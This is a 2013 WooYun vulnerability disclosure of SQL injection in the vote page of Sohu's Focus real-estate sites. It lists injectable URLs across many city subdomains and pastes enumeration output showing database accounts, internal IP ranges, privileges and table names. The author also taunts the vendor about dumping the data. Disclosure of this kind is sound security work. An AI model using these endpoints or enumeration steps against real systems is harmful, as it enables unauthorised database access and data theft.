当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020720

漏洞标题:搜狐某应用某功能存在SQL注入,通杀全国站点

相关厂商:焦点房产

漏洞作者: se55i0n

提交时间:2013-03-27 10:22

修复时间:2013-05-11 10:22

公开时间:2013-05-11 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-27: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-11: 细节向公众公开

简要描述:

看了道哥的黑板报,我觉得我没接触过安全,因为我没有一个裤子!
搜狐,如果你们觉得漏洞不重要可以继续忽略,哥就把该应用全国的裤子都收了!剑心,你收裤子不?

详细说明:

存在问题的应用为搜狐的焦点房产网,全国所有焦点房产网的vote功能都存在注入!
1)仅仅举一个例子,测试站点:http://ts.focus.cn/vote/developer_intro.php?ID=90

2.png


2)测试下数据库用户什么权限,自己看吧;

[*] 'fdbuser'@'10.10.90.%' [19]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: UPDATE
[*] 'fdbuser'@'10.11.160.%' [19]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: UPDATE
[*] 'fdbuser'@'10.11.24.%' [19]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: UPDATE
[*] 'fdbuser'@'192.168.242.%' [19]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: UPDATE
[*] 'fdbuser'@'localhost' [19]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EXECUTE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW VIEW
    privilege: UPDATE
[*] 'mysqlmon'@'192.168.242.180' (administrator) [26]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'pingmysql'@'10.10.58.195' [1]:
    privilege: USAGE
[*] 'pingmysql'@'10.11.36.20' [1]:
    privilege: USAGE
[*] 'pingmysql'@'10.11.36.22' [1]:
    privilege: USAGE
[*] 'pingmysql'@'192.168.1.128' [1]:
    privilege: USAGE
[*] 'pingmysql'@'192.168.1.139' [1]:
    privilege: USAGE
[*] 'pingmysql'@'192.168.1.178' [1]:
    privilege: USAGE
[*] 'readonly'@'%' [2]:
    privilege: CREATE TEMPORARY TABLES
    privilege: SELECT
[*] 'repadm'@'192.168.242.%' [1]:
    privilege: REPLICATION SLAVE
[*] 'repadm'@'192.168.242.87' [1]:
    privilege: REPLICATION SLAVE
[*] 'repladmin'@'10.10.90.%' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'repladmin'@'192.168.242.%' [1]:
    privilege: REPLICATION SLAVE
[*] 'root'@'127.0.0.1' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE


3)站点数据库;

1.png


4)随便找个库跑下表;

Database: tshouse
[268 tables]
+-------------------------+
| ad_order                |
| ad_page                 |
| ad_position             |
| ad_sort                 |
| ad_style                |
| ad_word                 |
| add_boss_log            |
| admin_fakename          |
| against_agent           |
| agent                   |
| album_class             |
| album_photo_count       |
| art_sh_htopic           |
| article_admin           |
| article_class           |
| article_vote            |
| bbs_style               |
| bj_mem_group_marks      |
| bookmarks_category      |
| bz_apply                |
| click                   |
| clock                   |
| cp_msg                  |
| day_posts               |
| db_query_cache          |
| del_index               |
| deny_msg                |
| deny_photo              |
| diary_html_head_config  |
| diary_resident_config   |
| dmc_account             |
| dmc_around              |
| dmc_askuser             |
| dmc_board_account       |
| dmc_board_msg           |
| dmc_construct_type_dict |
| dmc_deputy              |
| dmc_dict_power          |
| dmc_dict_structure      |
| dmc_direction_dict      |
| dmc_dpxl                |
| dmc_facilities          |
| dmc_favorite            |
| dmc_gov_locate          |
| dmc_house               |
| dmc_investor            |
| dmc_keywords            |
| dmc_kfs                 |
| dmc_link                |
| dmc_loopline_dict       |
| dmc_message             |
| dmc_message_class       |
| dmc_movement_info       |
| dmc_movement_info_bak   |
| dmc_movement_info_page  |
| dmc_movement_info_proj  |
| dmc_news_keywords       |
| dmc_noun                |
| dmc_price_incre         |
| dmc_proj                |
| dmc_proj_correct        |
| dmc_proj_del            |
| dmc_proj_effectphoto    |
| dmc_proj_link           |
| dmc_proj_maillist       |
| dmc_proj_mobilelist     |
| dmc_proj_photo          |
| dmc_proj_price_list     |
| dmc_proj_sale_list      |
| dmc_proj_tag            |
| dmc_proj_tuangou        |
| dmc_proj_type_dict      |
| dmc_register            |
| dmc_related_proj        |
| dmc_resident_dict       |
| dmc_sale_time           |
| dmc_search_house        |
| dmc_set                 |
| dmc_showpiece           |
| dmc_subject             |
| dmc_subject_item        |
| dmc_team                |
| dmc_team_sub            |
| dmc_tongzhi             |
| dmc_txt_top             |
| dmc_type                |
| dmc_type_class          |
| dmc_type_comment        |
| dmc_user                |
| dmc_zhoubian            |
| elite_account           |
| elite_article           |
| elite_class             |
| elite_intro             |
| elite_pic               |
| eml_templet             |
| eml_templet_imgmod      |
| eml_templet_mod         |
| emml_email_template     |
| emml_focus_mail         |
| emml_list               |
| emml_login_session      |
| emml_mail_subscribe     |
| emml_maillist           |
| emml_options            |
| emml_sendmail           |
| emml_subscriber         |
| emml_subscriber_del     |
| eye_hot                 |
| files_category          |
| focus_gift              |
| focus_msg               |
| focustalk_a             |
| focustalk_jb            |
| focustalk_q             |
| focustalk_q_a           |
| focustalk_suji          |
| forum_elite_detail      |
| forum_elite_tag         |
| forum_favourite         |
| forum_focus_detail      |
| forum_news_sort         |
| gather                  |
| gather_bak              |
| gift_change             |
| graph_news              |
| graph_news_hot          |
| graph_news_hot_seed     |
| group_around            |
| group_article           |
| group_article_del       |
| group_focus             |
| group_forum_tongji      |
| group_help_phone        |
| group_info              |
| group_member            |
| group_member_sort       |
| group_member_week_sort  |
| groupweeksort           |
| groupweeksort_temp      |
| hide_msg                |
| hot_news_ad             |
| house_album_focus       |
| house_album_info        |
| house_bookmarks         |
| house_click             |
| house_click_7           |
| house_count             |
| house_day_update        |
| house_files             |
| house_forum             |
| house_forum_admin       |
| house_forum_del         |
| house_forum_delbak      |
| house_forum_edit        |
| house_forum_elite       |
| house_forum_newmsg      |
| house_forum_tags        |
| house_forum_top         |
| house_forum_warn        |
| house_group             |
| house_group_detail      |
| house_group_pic         |
| house_menu              |
| house_msg_tags          |
| house_photos            |
| house_photos_class      |
| house_photos_commend    |
| house_photos_count      |
| house_photos_del        |
| house_photos_focus      |
| house_photos_nearby     |
| house_sub_forum         |
| houseztmaker            |
| hv_base_new             |
| info                    |
| linkman                 |
| lock_msg                |
| materials               |
| materials_brand         |
| materials_brand_class   |
| materials_click_7       |
| materials_click_log     |
| materials_commend       |
| materials_owner         |
| materials_photo         |
| mem_half_marks          |
| memberweeksort          |
| memberweeksort_temp     |
| modmsg                  |
| modmsg_time             |
| msg_click_temp          |
| msg_count               |
| msg_count_del           |
| msg_count_sort          |
| msg_count_temp          |
| msg_stat                |
| msg_stat_week           |
| msg_view_log            |
| note                    |
| note_content            |
| note_del                |
| note_info               |
| note_type_relation      |
| online_user             |
| page                    |
| permit_member           |
| personl_order           |
| photo_click_temp        |
| photos_album            |
| photos_album_del        |
| photos_album_extend     |
| photos_album_vote       |
| photos_class            |
| photos_vote             |
| photos_vote_count       |
| pollresult              |
| polls                   |
| prep_subj               |
| prep_subj_cite          |
| prep_subj_class         |
| prep_subj_item          |
| project_users           |
| py_zdwc                 |
| register_20050425       |
| review_renke            |
| review_type             |
| review_user_sort        |
| reviewhouse             |
| reviewhouse_assess      |
| reviewhouse_grade       |
| room_type               |
| sales                   |
| sales_log               |
| sales_order             |
| sales_proj              |
| secret_forum_key        |
| secret_forum_key_log    |
| seven_group_marks_view  |
| sub_group_forum         |
| tbl_bbsadmin_apply      |
| tbl_news_media          |
| tbl_news_sycount        |
| tbl_news_syztcount      |
| tbl_news_top            |
| tbl_recommend_forum     |
| tbl_recommend_user      |
| tejiafang               |
| v2012_hot_posts         |
| vote                    |
| wap_pic_dev             |
| wap_picture_class       |
| warn_wordsdetail        |
| yaohao_data1            |
| yaohao_data2            |
| yaohao_data3            |
| yaohao_data4            |
| yaohao_list             |
| yaohao_open1            |
| yaohao_open2            |
| yaohao_open3            |
| yaohao_open4            |
| yaohao_sort1            |
| yaohao_sort2            |
| yaohao_sort3            |
| yaohao_sort4            |
| yaohao_target3          |
| yaohao_target4          |
+-------------------------+


5)哥又检测了一些站点,肯定全国各地的焦点房产网都存在同样的问题;

http://sz.focus.cn/vote/developer_intro.php?ID=236
http://cs.focus.cn/vote/developer_intro.php?ID=746
http://house.focus.cn/vote/developer_intro.php?ID=2093
http://bd.focus.cn/vote/developer_intro.php?ID=59
http://cq.focus.cn/vote/developer_intro.php?ID=1548
http://tj.focus.cn/vote/developer_intro.php?ID=827 
http://zz.focus.cn/vote/developer_intro.php?ID=547
http://nc.focus.cn/vote/developer_intro.php?ID=17
http://huizhou.focus.cn/vote/developer_intro.php?ID=1859
http://km.focus.cn/vote/developer_intro.php?ID=768
http://xa.focus.cn/vote/developer_intro.php?ID=1494 
http://jn.focus.cn/vote/developer_intro.php?ID=150029
http://hrb.focus.cn/vote/developer_intro.php?ID=55
http://dl.focus.cn/vote/developer_intro.php?ID=797
http://cd.focus.cn/vote/developer_intro.php?ID=111835
http://hz.focus.cn/vote/developer_intro.php?ID=687
http://yc.focus.cn/vote/developer_intro.php?ID=86


PS:剩下的你们自己去测试吧!

漏洞证明:

见详细说明~

修复方案:

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-27 10:39

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-27 18:25 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    通杀全国站点?这是个亮点楼主是哪个组织的

  2. 2013-04-26 12:10 | 偉哥 ( 实习白帽子 | Rank:67 漏洞数:11 | 哥是没帽子)

    才10?好不给力